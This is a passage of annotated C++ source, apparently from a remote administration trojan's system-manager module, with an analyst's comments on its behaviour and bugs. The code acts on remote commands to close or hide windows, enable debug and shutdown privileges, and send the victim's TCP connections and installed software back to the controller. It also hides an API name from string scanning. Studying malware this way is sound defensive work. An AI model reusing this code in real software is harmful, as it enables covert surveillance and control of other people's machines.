Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo));
}
// Posts WM_CLOSE to the window identified by the first 4 bytes of buf, waits
// 200 ms and sends a refreshed window list.
// Analyst note: the value comes straight from the received command and is
// used as a window handle without validation; only 32 bits are carried.
void CSystemManager::CloseWindow(LPBYTE buf)
{
DWORD hwnd;
memcpy(&hwnd,buf,sizeof(DWORD)); // window handle value from the command
::PostMessage((HWND__ *)hwnd,WM_CLOSE,0,0); // ask the window to close
Sleep(200);
SendWindowsList(); // refresh the window list
}
// Calls ShowWindow on the window identified by the first DWORD of buf, using
// the second DWORD as the show command (the dispatcher describes this as
// maximise / minimise / hide). Both values come from the received command and
// are used as given.
void CSystemManager::TestWindow(LPBYTE buf)
{
DWORD hwnd;
DWORD dHow;
memcpy((void*)&hwnd,buf,sizeof(DWORD)); // window handle value
memcpy(&dHow,buf+sizeof(DWORD),sizeof(DWORD)); // show command
ShowWindow((HWND__ *)hwnd,dHow);
}
// Member variant of the privilege helper: enables or disables the privilege
// named PName on the current process token and returns false if the token
// cannot be opened or the last-error value is not ERROR_SUCCESS afterwards.
// Analyst notes:
//  - GetLastError is resolved through GetProcAddress from a name assembled
//    character by character, presumably to keep the name out of the string
//    table; the behaviour is otherwise the same as a direct call.
//  - The module handle returned by LoadLibrary is never released.
//  - Used in this file with SE_DEBUG_NAME and SE_SHUTDOWN_NAME.
bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
{
typedef BOOL (WINAPI *GetLastErrorT)
(
VOID
);
char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
// The lookup result is not checked.
LookupPrivilegeValueA(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
// The last-error value is tested rather than the call's return value.
if (pGetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
CloseHandle(hToken);
return bResult;
}
// Builds the TCP connection list with getTcpList(), passes the whole
// LocalAlloc block to Send(), then frees it.
void CSystemManager::SendTcpList()
{
UINT nRet = -1; // unused
LPBYTE lpBuffer = getTcpList();
if (lpBuffer == NULL)
return;
// The length sent is the allocation size reported by LocalSize().
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
//TCP 端口状态.
// Labels for TCP connection states, indexed by the dwState value of a TCP
// table row (13 entries, indices 0-12).
// NOTE(review): index 8 is MIB_TCP_STATE_CLOSE_WAIT in the Windows headers;
// the label used here differs from that name.
static char TcpState[][32] =
{
"???",
"CLOSED",
"LISTEN",
"SYN_SENT",
"SYN_RCVD",
"ESTABLISHED",
"FIN_WAIT1",
"FIN_WAIT2",
"ITMED_WAIT",
"CLOSING",
"LAST_ACK",
"TIME_WAIT",
"DELETE_TCB"
};
// 生成IP地址字符串.
// Formats an IPv4 address as dotted-decimal text. The input is byte-swapped
// with htonl first, then printed from the most significant byte down.
// Returns a pointer to a function-static 20-byte buffer that is overwritten
// by the next call, so the result must be copied before calling again.
PCHAR GetIP(unsigned int ipaddr)
{
static char pIP[20];
unsigned int nipaddr = htonl(ipaddr);
wsprintf(pIP, "%d.%d.%d.%d",
(nipaddr >>24) &0xFF,
(nipaddr>>16) &0xFF,
(nipaddr>>8) &0xFF,
(nipaddr)&0xFF);
return pIP;
}
// Reads the system TCP table and returns a LocalAlloc buffer: TOKEN_TSLIST,
// then per connection five NUL-terminated strings - local address, local
// port, remote address, remote port, state label. The caller frees the
// buffer with LocalFree.
// Analyst notes:
//  - The table is read into a fixed 10240-byte stack buffer and the
//    GetTcpTable result is not checked; if the call fails the zeroed buffer
//    yields an empty list (presumably, since dwNumEntries is then 0).
//  - cState is only rewritten for state values below 13, so an unexpected
//    state repeats the previous row's label.
//  - Allocation results are not checked for NULL.
LPBYTE CSystemManager::getTcpList()
{
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
char cLocalAddr[MAX_PATH] = {0};
char cLocalPort[MAX_PATH] = {0};
char cRemoteAddr[MAX_PATH] = {0};
char cRemotePort[MAX_PATH] = {0};
char cState[MAX_PATH] = {0};
DWORD dwState;
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 10240);
lpBuffer[0] = TOKEN_TSLIST;
dwOffset = 1;
DWORD dwSize = 10240;
BYTE pData[10240]; // raw table buffer, 10240 bytes
MIB_TCPTABLE *pTCPTable = (MIB_TCPTABLE*)pData;
memset(pData,0,dwSize);
// Fetch the TCP table (sorted, per the TRUE argument)
GetTcpTable(pTCPTable,&dwSize,TRUE);
// Walk the table rows
for (DWORD i = 0; i < pTCPTable->dwNumEntries; i++)
{
wsprintf(cLocalAddr, "%s",GetIP(pTCPTable->table[i].dwLocalAddr)); // local IP address
wsprintf(cLocalPort, "%d",htons((WORD)pTCPTable->table[i].dwLocalPort)); // local port
wsprintf(cRemoteAddr, "%s",GetIP(pTCPTable->table[i].dwRemoteAddr)); // remote IP address
wsprintf(cRemotePort, "%d",htons((WORD)pTCPTable->table[i].dwRemotePort)); // remote port
dwState = pTCPTable->table[i].dwState; // connection state
if (dwState < 13)
{
wsprintf(cState,"%s",TcpState[dwState]);
}
// Five strings plus their five terminators
dwLength = lstrlen(cLocalAddr) + lstrlen(cLocalPort) + lstrlen(cRemoteAddr) + lstrlen(cRemotePort)+ lstrlen(cState) + 5;
// Buffer too small: reallocate
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
memcpy(lpBuffer + dwOffset, cLocalAddr, lstrlen(cLocalAddr) + 1);
dwOffset += lstrlen(cLocalAddr) + 1;
memcpy(lpBuffer + dwOffset, cLocalPort, lstrlen(cLocalPort) + 1);
dwOffset += lstrlen(cLocalPort) + 1;
memcpy(lpBuffer + dwOffset, cRemoteAddr, lstrlen(cRemoteAddr) + 1);
dwOffset += lstrlen(cRemoteAddr) + 1;
memcpy(lpBuffer + dwOffset, cRemotePort, lstrlen(cRemotePort) + 1);
dwOffset += lstrlen(cRemotePort) + 1;
memcpy(lpBuffer + dwOffset, cState, lstrlen(cState) + 1);
dwOffset += lstrlen(cState) + 1;
}
// Trim the buffer to the bytes actually used
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
return lpBuffer;
}
// Builds the installed-software list with getSoftList(), passes the whole
// LocalAlloc block to Send(), then frees it.
void CSystemManager::SendSoftList()
{
UINT nRet = -1; // unused
LPBYTE lpBuffer = getSoftList();
if (lpBuffer == NULL)
return;
// The length sent is the allocation size reported by LocalSize().
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
// Enumerates the subkeys of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
// and returns a LocalAlloc buffer: TOKEN_rjLIST followed by the DisplayName of
// every subkey that has one, each NUL-terminated. The caller frees the buffer
// with LocalFree.
// Analyst notes:
//  - Both the parent key and every subkey are opened with KEY_ALL_ACCESS
//    although they are only read; those opens fail without sufficient rights.
//  - The `continue` on an empty key name skips the next RegEnumKeyEx call, so
//    lRetVal and szName do not change and the loop cannot make progress.
//  - The loop ends only on ERROR_NO_MORE_ITEMS; other error codes do not stop it.
//  - hSubKey is never closed, and RegCloseKey(hKey) runs even when the first
//    open failed.
LPBYTE CSystemManager::getSoftList()
{
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
lpBuffer[0] = TOKEN_rjLIST;
dwOffset = 1;
char szSubKey[MAX_PATH] = ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall");
HKEY hKey,hSubKey;
LONG lRetVal,lRetVal2;
DWORD nIndex = 0;
DWORD nNameLen = MAX_PATH; // capacity for a subkey name
DWORD nDisplayLen = MAX_PATH; // capacity for a display name
DWORD nUninstallLen = MAX_PATH; // unused
char szName[MAX_PATH],szDispayName[MAX_PATH],szUninstall[MAX_PATH];
lRetVal = RegOpenKeyEx(HKEY_LOCAL_MACHINE,szSubKey,0,KEY_ALL_ACCESS,&hKey); // open the Uninstall key
DWORD nAttribute = REG_BINARY|REG_DWORD|REG_SZ|REG_EXPAND_SZ|REG_MULTI_SZ|REG_NONE; // passed as the type out-parameter below
// Start enumerating
if (ERROR_SUCCESS == lRetVal)
{
lRetVal = RegEnumKeyEx(hKey,nIndex,szName,&nNameLen,0,NULL,NULL,0);
while(lRetVal != ERROR_NO_MORE_ITEMS)
{
nIndex++;
if (lstrcmpi(szName,"") == 0)
continue;
wsprintf(szUninstall,"%s\\%s",szSubKey,szName); // full subkey path
memset(szDispayName,0,MAX_PATH);
nDisplayLen = MAX_PATH;
lRetVal2 = RegOpenKeyEx(HKEY_LOCAL_MACHINE,szUninstall,0,KEY_ALL_ACCESS,&hSubKey); // open the product's subkey
if (lRetVal2 == ERROR_SUCCESS)
{
RegQueryValueEx(hSubKey,"DisplayName",0,&nAttribute,(LPBYTE)szDispayName,&nDisplayLen);
if (lstrcmpi(szDispayName,"") != 0)
{
dwLength = lstrlen(szDispayName) + 1;
// Buffer too small: reallocate
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
// Copies the text without its terminator; the offset still advances past
// one extra byte, which is left as it was in the buffer.
memcpy(lpBuffer + dwOffset, szDispayName, dwLength - 1);
dwOffset += lstrlen(szDispayName) + 1;// append the name to the list
}
}
nNameLen = MAX_PATH;
memset(szName,0,MAX_PATH);
lRetVal = RegEnumKeyEx(hKey,nIndex,szName,&nNameLen,0,NULL,NULL,0);
}
}
RegCloseKey(hKey);
// Trim the buffer to the bytes actually used
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
return lpBuffer;
}
// Enables the shutdown privilege, calls ExitWindowsEx with the caller's
// flags (dwReason is passed as the uFlags argument, with reason code 0), and
// disables the privilege again. The ExitWindowsEx result is not checked.
// Analyst note: no call site is visible in this file; the dispatcher in
// OnReceive has no case that reaches this function.
void CSystemManager::ShutdownWindows( DWORD dwReason )
{
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
ExitWindowsEx(dwReason, 0);
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
}